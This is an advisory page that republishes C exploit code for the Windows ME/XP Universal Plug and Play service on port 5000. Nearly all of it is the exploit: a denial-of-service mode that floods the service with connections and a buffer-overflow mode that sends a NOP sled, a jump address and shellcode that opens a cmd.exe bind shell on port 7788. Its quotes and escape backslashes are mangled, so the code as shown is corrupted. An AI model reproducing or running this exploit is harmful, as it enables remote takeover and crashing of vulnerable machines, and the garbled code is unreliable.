‘UPNP Exploit Code Released’

Summary

‘As we reported in our previous article: UPNP – Multiple Remote Windows XP/ME/98 Vulnerabilities, a security vulnerability in the universal plug-and-play feature of Windows allows attackers to execute arbitrary commands remotely. The following is an exploit code that can be used to test for this vulnerability.’

Credit:

‘The information has been provided by Gabriel Maggiotti.’


Details

Exploit:
/*
 * WinME/XP UPNP dos & overflow
 *
 * Run: ./XPloit host <option>
 *
 * Windows run the ‘Universal Plug and Play technology’ service
 * at port 5000. In the future this will allow for seemless
 * connectivity of various devices such as a printer.
 * This service have a DoS and a buffer overflow I exploit here.
 *
 * PD: the -e option spawns a cmd.exe shell on port 7788 coded by isno
 *
 * Author: Gabriel Maggiotti
 * Email: gmaggiot@ciudad.com.ar
 * Webpage: http://qb0x.net
 */

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <unistd.h>
#include <fcntl.h>

#define MAX 10000
#define PORT 5000
#define FREEZE 512
#define NOP 0x43 //inc ebx, instead of 0x90

/***************************************************************************/

int main(int argc,char *argv[])
{
int sockfd[MAX];
char sendXP[]=’XP’;
char jmpcode[281], execode[840],request[2048];
char *send_buffer;
int num_socks;
int bindport;
int i;
int port;

 unsigned char shellcode[] =
        ‘x90xebx03x5dxebx05xe8xf8xffxffxffx83xc5x15x90x90’
        ‘x90x8bxc5x33xc9x66xb9x10x03x50x80x30x97x40xe2xfa’
        ‘x7ex8ex95x97x97xcdx1cx4dx14x7cx90xfdx68xc4xf3x36’
        ‘x97x97x97x97xc7xf3x1exb2x97x97x97x97xa4x4cx2cx97’
        ‘x97x77xe0x7fx4bx96x97x97x16x6cx97x97x68x28x98x14’
        ‘x59x96x97x97x16x54x97x97x96x97xf1x16xacxdaxcdxe2’
        ‘x70xa4x57x1cxd4xabx94x54xf1x16xafxc7xd2xe2x4ex14’
        ‘x57xefx1cxa7x94x64x1cxd9x9bx94x5cx16xaexdcxd2xc5’
        ‘xd9xe2x52x16xeex93xd2xdbxa4xa5xe2x2bxa4x68x1cxd1’
        ‘xb7x94x54x1cx5cx94x9fx16xaexd0xf2xe3xc7xe2x9ex16’
        ‘xeex93xe5xf8xf4xd6xe3x91xd0x14x57x93x7cx72x94x68’
        ‘x94x6cx1cxc1xb3x94x6dxa4x45xf1x1cx80x1cx6dx1cxd1’
        ‘x87xdfx94x6fxa4x5ex1cx58x94x5ex94x5ex94xd9x8bx94’
        ‘x5cx1cxaex94x6cx7exfex96x97x97xc9x10x60x1cx40xa4’
        ‘x57x60x47x1cx5fx65x38x1exa5x1axd5x9fxc5xc7xc4x68’
        ‘x85xcdx1exd5x93x1axe5x82xc5xc1x68xc5x93xcdxa4x57’
        ‘x3bx13x57xe2x6exa4x5ex1dx99x13x5exe3x9exc5xc1xc4’
        ‘x68x85xcdx3cx75x7fxd1xc5xc1x68xc5x93xcdx1cx4fxa4’
  ‘x57x3bx13x57xe2x6exa4x5ex1dx99x17x6ex95xe3x9exc5’
        ‘xc1xc4x68x85xcdx3cx75x70xa4x57xc7xd7xc7xd7xc7x68’
        ‘xc0x7fx04xfdx87xc1xc4x68xc0x7bxfdx95xc4x68xc0x67’
        ‘xa4x57xc0xc7x27x9bx3cxcfx3cxd7x3cxc8xdfxc7xc0xc1’
        ‘x3axc1x68xc0x57xdfxc7xc0x3axc1x3axc1x68xc0x57xdf’
        ‘x27xd3x1ex90xc0x68xc0x53xa4x57x1cxd1x63x1exd0xab’
        ‘x1exd0xd7x1cx91x1exd0xafxa4x57xf1x2fx96x96x1exd0’
        ‘xbbxc0xc0xa4x57xc7xc7xc7xd7xc7xdfxc7xc7x3axc1xa4’
        ‘x57xc7x68xc0x5fx68xe1x67x68xc0x5bx68xe1x6bx68xc0’
        ‘x5bxdfxc7xc7xc4x68xc0x63x1cx4fxa4x57x23x93xc7x56’
        ‘x7fx93xc7x68xc0x43x1cx67xa4x57x1cx5fx22x93xc7xc7’
        ‘xc0xc6xc1x68xe0x3fx68xc0x47x14xa8x96xebxb5xa4x57’
        ‘xc7xc0x68xa0xc1x68xe0x3fx68xc0x4bx9cx57xe3xb8xa4’
        ‘x57xc7x68xa0xc1xc4x68xc0x6fxfdxc7x68xc0x77x7cx5f’
        ‘xa4x57xc7x23x93xc7xc1xc4x68xc0x6bxc0xa4x5exc6xc7’
        ‘xc1x68xe0x3bx68xc0x4fxfdxc7x68xc0x77x7cx3dxc7x68’
        ‘xc0x73x7cx69xcfxc7x1exd5x65x54x1cxd3xb3x9bx92x2f’
        ‘x97x97x97x50x97xefxc1xa3x85xa4x57x54x7cx7bx7fx75’
        ‘x6ax68x68x7fx05x69x68x68xdcxc1x70xe0xb4x17x70xe0’
        ‘xdbxf8xf6xf3xdbxfexf5xe5xf6xe5xeexd6x97xdcxd2xc5’
        ‘xd9xd2xdbxa4xa5x97xd4xe5xf2xf6xe3xf2xc7xfexe7xf2’
        ‘x97xd0xf2xe3xc4xe3xf6xe5xe3xe2xe7xdexf9xf1xf8xd6’
  ‘x97xd4xe5xf2xf6xe3xf2xc7xe5xf8xf4xf2xe4xe4xd6x97’
        ‘xd4xfbxf8xe4xf2xdfxf6xf9xf3xfbxf2x97xc7xf2xf2xfc’
        ‘xd9xf6xfaxf2xf3xc7xfexe7xf2x97xd0xfbxf8xf5xf6xfb’
        ‘xd6xfbxfbxf8xf4x97xc0xe5xfexe3xf2xd1xfexfbxf2x97’
        ‘xc5xf2xf6xf3xd1xfexfbxf2x97xc4xfbxf2xf2xe7x97xd2’
        ‘xefxfexe3xc7xe5xf8xf4xf2xe4xe4x97x97xc0xc4xd8xd4’
        ‘xdcxa4xa5x97xe4xf8xf4xfcxf2xe3x97xf5xfexf9xf3x97’
        ‘xfbxfexe4xe3xf2xf9x97xf6xf4xf4xf2xe7xe3x97xe4xf2’
        ‘xf9xf3x97xe5xf2xf4xe1x97x95x97x89xfbx97x97x97x97’
        ‘x97x97x97x97x97x97x97x97xf4xfaxf3xb9xf2xefxf2x97’
        ‘x68x68x68x68′;
struct hostent *he;
struct sockaddr_in their_addr;

  if(argc!=3)
  {
    fprintf(stderr,’usage:%s <hostname> <command>n’,argv[0]);
    fprintf(stderr,’-f freeze the machine.n’);
    fprintf(stderr,’-e exploit.n’);
    exit(1);
  }

  if(strstr(argv[2],’-f’)) {
    num_socks=FREEZE;
    send_buffer=sendXP;
  }

  if(strstr(argv[2],’-e’)) {
    num_socks=1;
    send_buffer=request;
    bindport^=0x9797;
    shellcode[778]= (bindport) & 0xff;
    shellcode[779]= (bindport >> 8) & 0xff;

    for(i = 0; i < 268; i++)
            jmpcode[i] = (char)NOP;

    jmpcode[268] = (char)0x4d;
    jmpcode[269] = (char)0x3f;
    jmpcode[270] = (char)0xe3;
    jmpcode[271] = (char)0x77;
    jmpcode[272] = (char)0x90;
    jmpcode[273] = (char)0x90;
    jmpcode[274] = (char)0x90;
    jmpcode[275] = (char)0x90;

    //jmp [ebx+0x64], jump to execute shellcode
    jmpcode[276] = (char)0xff;
    jmpcode[277] = (char)0x63;
    jmpcode[278] = (char)0x64;
    jmpcode[279] = (char)0x90;
    jmpcode[280] = (char)0x00;

    for(i = 0; i < 32; i++)
         execode[i] = (char)NOP;
    execode[32]=(char)0x00;
    strcat(execode, shellcode);

         snprintf(request, 2048, ‘%s%srnrn’, jmpcode, execode);
  }

  if((he=gethostbyname(argv[1]))==NULL)
  {
    perror(‘gethostbyname’);
    exit(1);
  }

/***************************************************************************/

  for(i=0; i<num_socks;i++)
    if( (sockfd[i]=socket(AF_INET,SOCK_STREAM,0)) == -1) {
      perror(‘socket’); exit(1);
    }

  their_addr.sin_family=AF_INET;
  their_addr.sin_port=htons(PORT);
  their_addr.sin_addr=*((struct in_addr*)he->h_addr);
  bzero(&(their_addr.sin_zero),8);

  for(i=0; i<num_socks;i++)
    if( connect(sockfd[i],(struct sockaddr*)&their_addr, sizeof(struct sockaddr))==-1)
  {
    perror(‘connect’);
    exit(1);
  }

  
  for(i=0; i<num_socks;i++)
  if(send(sockfd[i],send_buffer,strlen(send_buffer),0) ==-1)
  {
    perror(‘send’);
    exit(0);
  }

  for(i=0; i<num_socks;i++)
  close(sockfd[i]);

return 0;
}’

Categories: Exploits